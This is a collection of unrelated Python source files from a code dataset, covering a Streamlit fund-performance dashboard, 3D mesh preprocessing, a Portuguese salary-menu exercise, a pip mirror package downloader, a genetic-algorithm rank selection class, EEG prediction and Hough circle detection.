Diversification\")\r\n st.plotly_chart(diversification_pie)\r\n\r\n#this gets the daily returns\r\ndef daily_returns(dashtools):\r\n \r\n #this makes the header\r\n st.subheader(\"Distribution of Portfolio's Daily Returns\")\r\n \r\n #this gets the percent change\r\n port_rets = dashtools.daily_portfolio['value'].pct_change().dropna()\r\n \r\n #this makes the distplot\r\n dist_plot = px.histogram(port_rets, height = 400, width = 700, nbins = 200)\r\n \r\n #this just puts titles on it\r\n dist_plot.update_layout(showlegend = False, xaxis_title = \"Return (%)\", yaxis_title = \"frequency\", font = dict(size = 15))\r\n \r\n #output the px object to streamlit\r\n st.plotly_chart(dist_plot)\r\n\r\n#portfolio statistics function\r\ndef port_stats(dashtools):\r\n \r\n ##############################################################################\r\n #this is for daily returns\r\n ##############################################################################\r\n \r\n #lets get the last 3 days then calculate the percent change then drop values then get the last value\r\n daily_return = dashtools.daily_portfolio.tail(3)['value'].pct_change().dropna().tail(1)\r\n \r\n #then multiply that to get the percentage return\r\n daily_return = round(float(daily_return.values) *100, 2)\r\n \r\n ##############################################################################\r\n #this is for weekly returns\r\n ##############################################################################\r\n \r\n #this gest the number of days that we are looking back it is used for making a dataframe to calculate over a range\r\n lookback = {0:5, 1:5, 2:2, 3:3, 4:4, 5:5, 6:5}\r\n \r\n #how many days we want to go back\r\n cutoff = lookback[dashtools.end_date.weekday()]\r\n \r\n #then get the data and cutoff the length we want\r\n port_val = dashtools.daily_portfolio['value'].iloc[-cutoff:]\r\n \r\n #get first entry\r\n first_day = port_val.head(1).values\r\n \r\n #get last entry\r\n last_day = port_val.tail(1).values\r\n \r\n #do the percent change\r\n weekly_return = round(float(((last_day - first_day) / first_day) * 100), 2)\r\n \r\n ##############################################################################\r\n #ytd return\r\n ##############################################################################\r\n ytd_date = dt.datetime(dashtools.end_date.year, 1, 1)\r\n ytd_days = int((dashtools.end_date - ytd_date).days / 7 *5)\r\n ytd_return = dashtools.daily_portfolio.tail(ytd_days)['value'].iloc[[0, -1]].pct_change().dropna()\r\n ytd_return = round(float(ytd_return.values) * 100, 2)\r\n \r\n ##############################################################################\r\n #yearly returns\r\n ##############################################################################\r\n yearly_return = dashtools.daily_portfolio.tail(252).iloc[[0, -1]]['value'].pct_change().dropna()\r\n yearly_return = round(float(yearly_return.values) * 100, 2)\r\n \r\n ##############################################################################\r\n #inception\r\n ##############################################################################\r\n inception_return = dashtools.daily_portfolio['value'].iloc[[0, -1]].pct_change().dropna()\r\n inception_return = round(float(inception_return.values) * 100, 2)\r\n \r\n #output header and make sure font color is right\r\n st.markdown(\"

    Today's Returns: {}%

    \".format(daily_return), unsafe_allow_html=True)\r\n st.markdown(\"

    This week's Returns: {}%

    \".format(weekly_return), unsafe_allow_html=True)\r\n st.markdown(\"

    365 day Return: {}%

    \".format(yearly_return), unsafe_allow_html=True)\r\n st.markdown(\"

    YTD Returns: {}%

    \".format(ytd_return), unsafe_allow_html=True)\r\n st.markdown(\"

    Since Inception: {}%

    \".format(inception_return), unsafe_allow_html=True)\r\n\r\n#makes the portfolio market statistics\r\ndef port_market(dashtools):\r\n\r\n #365 day volatility\r\n vol = dashtools.daily_portfolio[\"value\"].tail(252)\r\n vol = round(np.log(vol / vol.shift(1)).std() * 252 ** .5, 2)\r\n \r\n #get the performance of the fund\r\n perf = dashtools.daily_portfolio['value']\r\n \r\n #then get the benchmark\r\n spx = yf.download(\"^GSPC\", perf.index[0], perf.index[-1])['Close']\r\n \r\n #get alpha and beta\r\n y = dashtools.daily_portfolio['value'].pct_change().dropna().iloc[:-1]\r\n X = spx.pct_change().dropna()\r\n \r\n #run the model\r\n X = sm.add_constant(X)\r\n model = regression.linear_model.OLS(y,X).fit()\r\n \r\n #then find alpha and beta\r\n alpha = round(model.params[0], 5)\r\n beta = round(model.params[1], 2)\r\n \r\n #now get the sharpe \r\n sharpe_df = dashtools.daily_portfolio['value'].pct_change().dropna()\r\n ret = sharpe_df.mean()\r\n stdev = sharpe_df.std()\r\n sharpe = round(ret / stdev, 2)\r\n \r\n #output the header and check the font color\r\n st.markdown(\"

    365 day Volatility: {}

    \".format(vol), unsafe_allow_html=True)\r\n st.markdown(\"

    Portfolio Alpha: {}

    \".format(alpha), unsafe_allow_html=True)\r\n st.markdown(\"

    Portfolio Beta: {}

    \".format(beta), unsafe_allow_html=True)\r\n st.markdown(\"

    Portfolio Sharpe: {}

    \".format(sharpe), unsafe_allow_html=True)\r\n\r\n#portfolio composition tool\r\ndef port_comp(dashtools):\r\n\r\n #then you get the monthly portfolio price\r\n monthly_portfolio = dashtools.make_monthly_portfolio()\r\n \r\n #put title\r\n st.subheader(\"Portfolio Value by Composition\")\r\n \r\n #output it to streamlit \r\n st.bar_chart(monthly_portfolio)\r\n\r\n#this makes the performance of the fund vs SPX\r\ndef spx_perf(dashtools):\r\n\r\n #get the value of the fund\r\n perf = dashtools.daily_portfolio['value']\r\n \r\n #get spx values\r\n spx = yf.download(\"^GSPC\", dashtools.start_date, dashtools.end_date)['Close']\r\n \r\n #get the number of (shares) for our SPX comparison\r\n sp_shares = int(perf[0] / spx[0])\r\n \r\n #multiply shares to our spx to get equivalent value\r\n bench = spx * sp_shares\r\n \r\n #merge for output\r\n output_df = pd.concat([perf, bench], axis = 1)\r\n \r\n #rename columns for chart\r\n output_df.columns = [\"Port\", \"SPX\"]\r\n \r\n st.subheader(\"Portfolio vs S&P 500\")\r\n st.line_chart(output_df, width = 500, height = 300)\r\n\r\ndef make_top_row(dashtools):\r\n \r\n top_col1, top_col2, top_col3 = st.beta_columns((2,2,1))\r\n \r\n with top_col1:\r\n portfolio_pie(dashtools)\r\n \r\n with top_col2:\r\n daily_returns(dashtools)\r\n \r\n with top_col3:\r\n port_stats(dashtools)\r\n\r\ndef make_bottom_row(dashtools):\r\n \r\n bottom_col1, bottom_col2, bottom_col3 = st.beta_columns((1,2,2))\r\n \r\n with bottom_col1:\r\n port_market(dashtools)\r\n \r\n with bottom_col2:\r\n port_comp(dashtools)\r\n \r\n with bottom_col3:\r\n spx_perf(dashtools)\r\n\r\nwhile True:\r\n \r\n try:\r\n \r\n #we make the dashtools here to pass through all of the functions\r\n dashtools = DashTools()\r\n \r\n except:\r\n \r\n st.title(\"Oh no a problem has occured\")\r\n \r\n diagnostics()\r\n st.subheader(\"Excel file loaded:\")\r\n break\r\n \r\n #make update date\r\n update_date = dt.datetime.today().strftime(\"%a %D %I:%M %p\")\r\n \r\n #show last time we updted\r\n st.title(\"Leed's Investment Trading Group Fund (last updated: {})\".format(update_date))\r\n \r\n make_top_row(dashtools)\r\n make_bottom_row(dashtools)\r\n \r\n st.write(\"The information provided does not constitute as investment advice\")\r\n st.write(\"Created by Diego Alvarez, not associated with Leeds Investment Trading Group Fund, Values may not be up-to-date or approximations, updates don't occur until trading day ends\")\r\n \r\n #the cost basis day provided from LITG\r\n next_update = dt.datetime.today() + dt.timedelta(seconds = 60 * 60 * 4)\r\n \r\n #get update time\r\n next_update_time = next_update.strftime(\"%a %D %I:%M %p\")\r\n \r\n #output it\r\n st.write(\"next update is scheduled for {}\".format(next_update_time))\r\n \r\n #wait 30 minutes\r\n time.sleep(60 * 60 * 4)\r\n \r\n #then rerun the app\r\n st.experimental_rerun()\r\n ","sub_path":"dash_beta/lit_dash_season1.py","file_name":"lit_dash_season1.py","file_ext":"py","file_size_in_byte":13399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"470542421","text":"\nfrom datasets.configs.triangle_config import get_nearest_point_sampling_config\nfrom datasets.dataset import ShapeNetV2Dataset\nfrom tqdm import tqdm, trange\nimport shutil\n\nfrom pathlib import Path\nimport pickle\nimport threading\nimport trimesh\nimport logging\nimport time\nimport torch\n\n# add filemode=\"w\" to overwrite\nlogging.basicConfig(filename=\"preprocess_triangles.log\", level=logging.INFO,\n format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n\nDATA_FILE = 'calculated_data_{}.pkl'\nPARTITIONS = 100\nTHREAD_PARTITIONS = 12\n\nWAIT_ALIVE_TIME = 0.05\n\nSAMPLE_POINTS_COUNT = 500000 // PARTITIONS\nMAX_FILE_SIZE_MB = 25\n\nlogger = logging.getLogger(trimesh.__name__)\nlogger.setLevel(logging.ERROR)\n\n\ndef check_content(path):\n files = Path(path)\n conditions = [len(tuple(files.rglob('*.obj'))) > 0,\n len(tuple(files.rglob(DATA_FILE.replace('{}', '*')))) == PARTITIONS]\n return all(conditions)\n\n\ndef check_existing_parts_before(path, last_idx):\n files = Path(path)\n last_idx += 1\n for i in range(last_idx):\n if len(tuple(files.rglob(DATA_FILE.format(i)))) == 0:\n return i\n return last_idx\n\n\ndef download_data(input_dir, output_dir, timeout, regenerate=True, include_olny=None):\n \n config = get_triangle_samplit_config(SAMPLE_POINTS_COUNT)\n\n dataset = ShapeNetV2Dataset(input_dir, config, max_MB_file_size=MAX_FILE_SIZE_MB)\n\n if include_olny:\n files = list(enumerate(dataset.indexes))\n\n def filtered(x):\n for include_folder in include_olny:\n if x[1].startswith(include_folder):\n return True\n return False\n\n elements = sorted(list(map(lambda x: x[0], filter(filtered, files))))\n\n else:\n elements = [k for k in range(len(dataset))]\n\n def dump_data(index, i):\n path = dataset._get_folder_by_id(i)\n dst = Path(output_dir) / path\n try:\n start_time = time.time()\n\n value = dataset[i]\n\n for key in list(value.keys()):\n if isinstance(value[key], torch.Tensor):\n value[key] = value[key].cpu().numpy()\n\n with open(Path(dst) / DATA_FILE.format(index), 'wb') as file:\n pickle.dump(value, file)\n\n end_time = time.time()\n logging.info(\n f\"success processing folder {Path(dst) / DATA_FILE.format(index)} at {index} partition, spend time {end_time - start_time}\")\n except Exception as e:\n shutil.rmtree(dst, ignore_errors=True)\n\n logging.error(f\"Error in file {Path(dst) / DATA_FILE.format(index)}\")\n logging.error(f\"Error {e}\")\n\n threads = []\n\n for partition in range(PARTITIONS):\n\n for i in tqdm(elements):\n\n while True:\n threads = list(filter(lambda x: x[1].isAlive(), threads))\n # print(len(threads))\n if len(threads) < THREAD_PARTITIONS:\n break\n else:\n time.sleep(WAIT_ALIVE_TIME)\n # if len(threads) >= THREAD_PARTITIONS:\n # for dest,thread in threads:\n # try:\n # thread.join(timeout=timeout)\n # except Exception as e:\n # logging.error(f\"error on {dest}\")\n # shutil.rmtree(dest, ignore_errors=True)\n # threads.clear()\n\n path = dataset._get_folder_by_id(i)\n\n src = Path(input_dir) / path\n dst = Path(output_dir) / path\n\n last_existing_part = check_existing_parts_before(dst, partition)\n logging.info(f\"{path} has {last_existing_part} partitions last number\")\n if not regenerate and last_existing_part > partition:\n logging.info(f'skip {dst} partition {partition} because last_existing_part is {last_existing_part}')\n continue\n if last_existing_part == 0 or regenerate:\n shutil.rmtree(dst, ignore_errors=True)\n dst.mkdir(parents=True, exist_ok=True)\n\n thread = threading.Thread(target=dump_data, args=(last_existing_part, i))\n thread.start()\n\n threads.append((dst, thread))\n\n\nif __name__ == '__main__':\n path_to_dataset = '/home/malchul/work/datasets/ShapeNetCore.v2'\n output_path = 'data/new_shape_net_triangles'\n TIME = 6 * 60 #\n logging.info(f\"Split data to {SAMPLE_POINTS_COUNT} points in {PARTITIONS} by using {THREAD_PARTITIONS} thread\")\n download_data(path_to_dataset, output_path, TIME, regenerate=False, include_olny=['04379243'])\n\n\n\n\n","sub_path":"preprocessor/triangle_center_preprocessor.py","file_name":"triangle_center_preprocessor.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"448668941","text":"from qanta.extractors.abstract import AbstractFeatureExtractor\nfrom qanta.util.constants import ALPHANUMERIC\n\n\nclass TextExtractor(AbstractFeatureExtractor):\n @property\n def name(self):\n return 'text'\n\n def score_guesses(self, guesses, text):\n line = \"|text %s\" % ALPHANUMERIC.sub(' ', text.lower())\n for _ in guesses:\n yield line\n","sub_path":"qanta/extractors/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"123973467","text":"\nmenu = '''\n====================\nMENU\n====================\n0- Finaliza\n1- Cadastro\n2- Relatório Geral\n3- Relatório Acima da Média\n4- Maiores Salários\n5- Aumento salarial\n6- Idade do Mais Velho\n7- data de nascimento\n====================\nEscolha: '''\n\n# declarar as listas.\nlistaNomes = [\"Ana\",\"Carlos\",\"Pedro\"]\nlistaSalarios = [100,200,300]\nlistaSexo = ['F','M','M']\nlistaIdade = [13,25,78,]\nlistameses = ['janeiro','fevereiro','março','abril','maio','junho','julho','agosto','setembro','outulbro','novembro','dezembro']\n\nwhile True:\n escolha = input(menu)\n if escolha == '0':\n break\n elif escolha == '1':\n listaNomes.append(input(\"Digite seu nome: \"))\n listaSalarios.append(float(input(\"Digite seu salario: \")))\n listaSexo.append(input(\"Digite seu sexo: \"))\n listaIdade.append(int(input(\"Digite a idade: \")))\n elif escolha == '2':\n for indice, nome in enumerate(listaNomes):\n print(\"=-\" * 100)\n print(f\"Indice: {indice}\", end=\" \\t|\\t \")\n print(f\"Nome: {nome}\", end=\" \\t|\\t \")\n print(f\"Salário: {listaSalarios[indice]}\", end=\" \\t|\\t \")\n print(f\"Sexo: {listaSexo[indice]}\", end=\" \\t|\\t \")\n print(f\"Idade: {listaIdade[indice]}\", end=\" \\t|\\t \")\n print()\n print(\"=-\"*100)\n\n # for é o laço\n # ind é a variável que controla o laço\n # range é o intervalo. Neste caso. de 0 até o tamanho da lista. incremento de 1\n\n # for ind in range(0,len(listaNomes),1):\n # print(\"[\",listaNomes[ind],\"], \", listaSalarios[ind],\",\",listaSexo[ind])\n # print(listaIdade)\n # print(idadeMaisVelho)\n # print(nomeMaisVelho)\n # print(listameses[ind])\n # desta forma imprime as listas individualmente\n #print(listaNomes)\n #print(listaSalarios)\n #print(listaSexo)\n elif escolha == '3':\n # calcular a média\n soma = 0\n for salario in listaSalarios:\n soma = soma + float(salario)\n media = soma / len(listaSalarios)\n\n #quem ganha acima da média\n for x in range(0,len(listaNomes),1):\n if float(listaSalarios[x]) > media:\n print(listaNomes[x],\", \",listaSalarios[x])\n\n\n elif escolha == '4':\n maiorSalarioMasculino = 0\n maiorSalarioFEMININO = 0\n nomeMaiorSalarioFEM = \"\"\n nomeMaiorSalarioMASC = \"\"\n\n for x in range(0,len(listaSalarios),1):\n if listaSalarios[x] > maiorSalarioMasculino and listaSexo[x] == 'M':\n maiorSalarioMasculino = listaSalarios[x]\n nomeMaiorSalariosMASC = listaNomes[x]\n\n maiorSalarioFEMININO = 0\n for x in range(0,len(listaSalarios),1):\n if listaSalarios[x] > maiorSalarioFEMININO and listaSexo[x] == 'F':\n maiorSalarioFEMININO = listaSalarios[x]\n nomeMaiorSalariosFEM = listaNomes[x]\n\n print(nomeMaiorSalariosMASC, maiorSalarioMasculino)\n print(nomeMaiorSalariosFEM , maiorSalarioFEMININO)\n\n\n if maiorSalarioMasculino > maiorSalarioFEMININO:\n dif = maiorSalarioMasculino - maiorSalarioFEMININO\n else:\n dif = maiorSalarioFEMININO - maiorSalarioMasculino\n\n print(\"Diferença = \",dif)\n\n\n elif escolha == '5':\n perc = int(input(\"Digite o percentual de aumento: \"))\n\n soma = 0\n for salario in listaSalarios:\n soma = soma + float(salario)\n media = soma / len(listaSalarios)\n\n for x in range(0,len(listaSalarios),1):\n if listaSalarios[x] < float(media):\n listaSalarios[x] = listaSalarios[x] + (listaSalarios[x]*perc/100)\n\n\n\n elif escolha == '6':\n idade_maior = 0\n indice_maior = 0\n for indice, idade in enumerate(listaIdade):\n if indice == 0:\n idade_maior = idade\n indice_maior = indice\n if idade > idade_maior:\n idade_maior = idade\n indice_maior = indice\n\n print(\"Pessoa mais velha:\")\n print(f\"\\t Nome: {listaNomes[indice_maior]}\", end=\" \\t|\\t \")\n print(f\"\\t Idade: {listaIdade[indice_maior]}\")\n # print(f\"\\t Idade: {idade_maior}\")\n\n # tamanhoLaço = 3\n # primeiraVez = True\n # idadeMaisVelho = 0\n #\n # for ind in range(0,len(listaNomes),1):\n # nome = input(\"Digite o nome: \")\n # idade= int(input(\"Digite a idade: \"))\n #\n # if primeiraVez: # identifica a primeira digitação\n # nomeMaisVelho = nome\n # idadeMaisVelho= idade\n #\n # if idade > idadeMaisVelho:\n # nomeMaisVelho = nome\n # idadeMaisVelho= idade\n\n # print(\"A pessoa com mais idade é \",nomeMaisVelho)\n # print(\" e sua idade é \",idadeMaisVelho)\n elif escolha == '7':\n #\n #\n # for x in range(0,len(listameses),1):\n dia, mes, ano = input('Data (dd/mm/aaaa): ').split('/')\n print('voce nasceu em:')\n print(f\"{dia} de {listameses[int(mes) - 1]} de {ano}\")\nprint(\"Fim.\")\n\n\n","sub_path":"exercicios/aulas-auler-master/aula_6/exercicio2.py","file_name":"exercicio2.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"535656678","text":"from getalp.wsd.predicter import Predicter\nimport argparse\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_path', required=True, type=str)\n parser.add_argument('--weights', nargs=\"+\", type=str)\n args = parser.parse_args()\n\n predicter = Predicter()\n predicter.training_root_path = args.data_path\n predicter.ensemble_weights_path = args.weights\n\n predicter.predict()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/getalp/wsd/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"490344548","text":"\"\"\"\npip 下载源\n清华:https://pypi.tuna.tsinghua.edu.cn/simple\n阿里云:http://mirrors.aliyun.com/pypi/simple/\n豆瓣:http://pypi.douban.com/simple/\n\n\"\"\"\n\nimport requests,os,re\nfrom lxml.html import etree\n\nsource_dic={'1':'https://pypi.tuna.tsinghua.edu.cn/simple',\n '2':'http://mirrors.aliyun.com/pypi/simple/',\n '3':'http://pypi.douban.com/simple/'}\nheader={'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.17 Safari/537.36'}\n\nclass Pip_downs:\n def check_file_lines(self,filepath):#检查行数\n count = 0\n for index,line in enumerate(open(filepath, 'r')):\n count += 1\n print(index,line)\n print('count',count)\n\n def write_page(self,file_page,a):#写入文件\n if not os.path.exists(file_page):\n with open(file_page,'w',encoding='utf-8') as f:\n f.write(a)\n\n def read_page(self,file_page):#读取结果\n with open(file_page,'r') as f:\n res=f.read()\n return res\n\n def get_cons(self,flag):#先把html写入文件,输出文件列表\n file_s=''#初始化字符串\n url=''#初始化链接\n if not os.path.exists('res/'):\n os.mkdir('res/')\n if flag=='1':\n file_s='page_tsing.txt'\n url=source_dic['1']\n elif flag=='2':\n file_s='page_ali.txt'\n url=source_dic['2']\n elif flag=='3':\n file_s='page_douban.txt'\n url=source_dic['3']\n file_page='res/'+file_s\n res=requests.get(url,headers=header).text\n self.write_page(file_page,res)#写入文件\n res=self.read_page(file_page)#读取文件\n html=etree.HTML(res)\n lis=html.xpath('/html/body/a/text()')\n print('len_page',len(lis))\n return lis\n\n def get_files_url(self,flag,name):\n base_url=''\n if flag=='1':\n base_url=source_dic['1']\n elif flag=='2':\n base_url=source_dic['2']\n elif flag=='3':\n base_url=source_dic['3']\n full_url=base_url+'/'+name\n new_res=requests.get(full_url).content.decode('utf-8')\n # print(new_res)\n html=etree.HTML(new_res)\n file_names=html.xpath('//body/a/text()')\n file_urls=html.xpath('//body/a/@href')\n print(len(file_names))\n files_dic={}\n for name,url in zip(file_names,file_urls):\n files_dic[name]=base_url[:-7]+url[5:]\n print(files_dic)\n return files_dic\n\n def down_file(self,flag,name,name_s,path):\n files_dic=self.get_files_url(flag,name)\n # name_s='opencv_python-3.1.0.0-cp27-cp27m-macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64.whl'\n url=files_dic[name_s]\n fi=requests.get(url).content\n with open(path+'/'+name_s,'wb') as f:\n f.write(fi)\n print('{}已下载完成'.format(name))\n\n\nif __name__ == '__main__':\n p =Pip_downs()\n # p.get_files_url('1','opencv-python')\n p.down_file('1','opencv-python','opencv_python-3.1.0.0-cp27-cp27m-macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64.whl'\n,r'D:\\spiders_python\\python库下载器\\res')\n","sub_path":"python库下载器/downs.py","file_name":"downs.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"397070667","text":"# \r\n# Class: Rank Based Selection\r\n# Distributes the probability of selection according to rank. This has less \r\n# selective pressure than fitness based selection. \r\n# \r\n\r\nimport random\r\nimport time\r\nfrom copy import copy\r\nfrom selection import Selection\r\n\r\nclass Rank(Selection):\r\n name = \"Rank Based Selection\"\r\n\r\n def __init__(self, parent_count = 2):\r\n self.parent_count = parent_count\r\n\r\n def selection(self, population):\r\n results = []\r\n probabilities = self.selection_probability(population)\r\n\r\n # Get the number of required parents\r\n while(len(results) < self.parent_count):\r\n random.seed((len(results) + 1) * time.time())\r\n # Roll the dice \r\n p = random.random()\r\n candidate = None\r\n for i in range(len(probabilities)):\r\n # Get the individual that corresponds to the dice roll\r\n if p >= probabilities[i]:\r\n candidate = population[i]\r\n break\r\n # If candidate hasn't been selected, dice roll was last individual\r\n if candidate is None:\r\n candidate = population[-1]\r\n\r\n # Add selected individual to the results\r\n results.append(candidate)\r\n return results\r\n \r\n def selection_probability(self, population):\r\n n = len(population)\r\n # Gauss formula to get the sum of all ranks from 1 to n\r\n rank_sum = n * (n + 1) / 2\r\n\r\n # Calculate the rank based selection probabilities as an array\r\n prob = []\r\n for i in range(len(population)):\r\n prob.append((n - i)/rank_sum)\r\n return prob\r\n \r\n '''\r\n Given that P=3, probabilities are:\r\n sum = 6\r\n 1: (3 - 0) / 6 = 0.50\r\n 2: (3 - 1) / 6 = 0.33\r\n 3: (3 - 2) / 6 = 1.67\r\n [0.5, 0.33, 1.67]\r\n '''\r\n","sub_path":"Python/operators/selection/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"47266243","text":"# coding: utf-8\n\nfrom django.db import models\n#from freelance import UnixtimeField\n\n# Create your models here.\n\nclass Tag(models.Model):\n\tname = models.CharField(max_length=256)\n\t\n\nclass PermissionsHelper(models.Model):\n\n\tclass Meta:\n\n\t\tmanaged = False\n\n\t\tpermissions = ( \n\t\t\t('upload_image', 'Upload images'),\n\t\t)\n\t\t","sub_path":"web/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"577262919","text":"from joblib import load\nimport os\n\nfrom AppParametersManagement import AppParametersLoader\nfrom DataManagement import DataManager\n\n# ---------------------------------------------------------------------------------------------Load and instance Helpers\n# DataManger instance\ndm = DataManager()\n# App parameters loading and parsing\nparams = AppParametersLoader()\nparams.print_all()\n\n# -------------------------------------------------------------------------------------------------Load and prepare data\nprint(\"Load and prepare data\")\n# Dataset Loading\n# Creating train_test_split subsets and saving them\nif not os.path.exists(params.data_dir()):\n os.makedirs(params.data_dir())\n\ntopredict_brainwave_df = dm.load_data(os.path.join(params.data_dir(), params.topredict_file_name()),\n preprocess=True, # preprocess data if it has not been done yet\n outlier_subjects=[]) # no outliers in data to predict\n\ntopredict_brainwave_df = dm.format_topredict_df(topredict_brainwave_df)\n\n# --------------------------------------------------------------------------------------------------------Load predictor\npredictor = load(os.path.join(params.models_dir(), params.predictor_file_name()))\n# ------------------------------------------------------------------------------------------------------make predictions\npredictions = [round(value) for value in predictor.predict(topredict_brainwave_df)]\n# ------------------------------------------------------------------------------------------------------save predictions\npred_path = os.path.join(params.data_dir(),\n \"predicted_\" + params.topredict_file_name())\ndm.save_predictions(topredict_brainwave_df,\n predictions,\n pred_path\n )\n\nprint(f\"Predictions saved on file {pred_path}\")\nv = input(\"insert a value to continue...\")\n","sub_path":"App/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"409583846","text":"import requests\nimport os\n\nos.makedirs('tmp', exist_ok=True)\n\n\ndef download(url):\n basename = os.path.basename(url)\n fullname = os.path.join('tmp', basename)\n fullname = fullname.split('?')[0]\n res = requests.get(url)\n res.raise_for_status()\n imageFile = open(fullname, 'wb')\n for chunk in res.iter_content(1024):\n imageFile.write(chunk)\n imageFile.close()\n return fullname\n","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"119956357","text":"#----------------------------------------------------#\r\n# Plot tool\r\n#----------------------------------------------------#\r\nimport numpy as np\r\nfrom matplotlib.patches import FancyArrowPatch\r\nfrom mpl_toolkits.mplot3d import proj3d\r\n\r\nclass Arrow3D(FancyArrowPatch):\r\n def __init__(self, xs, ys, zs, *args, **kwargs):\r\n FancyArrowPatch.__init__(self, (0, 0), (0, 0), *args, **kwargs)\r\n self._verts3d = xs, ys, zs\r\n\r\n def draw(self, renderer):\r\n xs3d, ys3d, zs3d = self._verts3d\r\n xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)\r\n self.set_positions((xs[0], ys[0]), (xs[1], ys[1]))\r\n FancyArrowPatch.draw(self, renderer)\r\n\r\ndef set_axes_radius(ax, origin, radius):\r\n ax.set_xlim3d([origin[0] - radius, origin[0] + radius])\r\n ax.set_ylim3d([origin[1] - radius, origin[1] + radius])\r\n ax.set_zlim3d([origin[2] - radius, origin[2] + radius])\r\n\r\ndef set_axes_equal(ax):\r\n '''Make axes of 3D plot have equal scale so that spheres appear as spheres,\r\n cubes as cubes, etc.. This is one possible solution to Matplotlib's\r\n ax.set_aspect('equal') and ax.axis('equal') not working for 3D.\r\n\r\n Input\r\n ax: a matplotlib axis, e.g., as output from plt.gca().\r\n '''\r\n\r\n limits = np.array([\r\n ax.get_xlim3d(),\r\n ax.get_ylim3d(),\r\n ax.get_zlim3d(),\r\n ])\r\n\r\n origin = np.mean(limits, axis=1)\r\n radius = 0.5 * np.max(np.abs(limits[:, 1] - limits[:, 0]))\r\n set_axes_radius(ax, origin, radius)","sub_path":"plottool.py","file_name":"plottool.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"309360039","text":"import cv2\nimport numpy as np\n\nball = cv2.imread('theBall.png')\nh, w, c = ball.shape\ngray_img = cv2.cvtColor(ball, cv2.COLOR_BGR2GRAY)\nimg = cv2.medianBlur(gray_img, 3)\ncimg = cv2.cvtColor(img,cv2.COLOR_GRAY2BGR)\n\ncircles = cv2.HoughCircles(img,cv2.HOUGH_GRADIENT,1, w / 8,\n\n param1=100,param2=30,minRadius=10,maxRadius=100)\n\ncircles = np.uint16(np.around(circles))\n\nfor i in circles[0,:]:\n # draw the outer circle\n cv2.circle(ball,(i[0],i[1]),i[2],(0,255,0),2)\n print(ball[i[0], i[1]])\n # draw the center of the circle\n cv2.circle(ball,(i[0],i[1]),2,(0,0,255),3)\n\ncv2.imwrite(\"test.png\", ball)\n#cv2.imshow(\"HoughCirlces\", ball)\ncv2.waitKey()\ncv2.destroyAllWindows()","sub_path":"CircleDetection/circles.py","file_name":"circles.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"641689992","text":"\"\"\"Comparison between RASR Matlab and Python outputs.\nIt is a refactoring of the jupyter notebook and it is extended to include more advanced metrics and figure outputs.\n\"\"\"\n\nfrom utils.config import Config as cfg\nimport mne\nfrom mne.io import read_raw_eeglab\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom pyxdf import load_xdf\nfrom utils.utils import (epoch, get_stream_names, extract_signal_stream, float_index_to_time_index, estimate_rate,\n pandas_to_mne, check_params)\nfrom sklearn.pipeline import make_pipeline\nfrom timeflux_rasr.estimation import RASR\nfrom utils.viz import (plot_all_mne_data, plot_time_dist)\nimport logging\nimport os\nfrom timeit import default_timer as timer\nimport numpy as np\n\nConfig = cfg() # initialize class\nsns.set(font_scale=1)\nlogging.info(\"Config LOADED\")\n\nif __name__ == '__main__':\n # Kick-Off Notebook for rASR implementation\n \"\"\"\n This is the script version for comparison of our implementation with Sarah Blum's matlab on rASR. \n It consists in: \n - loading the eeg signal (and events?) from the *xdf* and *set* files\n - visualizing the power spectral density (check dead channels and line noise) \n - apply a IIR filter using either timeflux node or mne functions \n - epoching and apply any method from the RASR sklearn estimator \n - comparison both qualitative and quantitative of the RASR output\n - save the figure and results\n \"\"\"\n # TODO: use test configuration for looping though different parameters (SPRINT3)\n test_configuration = [{\"window_len\": 0.5, \"window_overlap\": 0.66, \"rejection_cutoff\": 3},\n {\"window_len\": 0.5, \"window_overlap\": 0.66, \"rejection_cutoff\": 5},\n {\"window_len\": 3, \"window_overlap\": 0.9, \"rejection_cutoff\": 3},\n {\"window_len\": 3, \"window_overlap\": 0.9, \"rejection_cutoff\": 5}]\n for test_ind in range(len(test_configuration)): # for looping though many test_configuration\n\n Config.results_folder = os.path.join(Config.results_folder, f\"test_{test_ind}\")\n 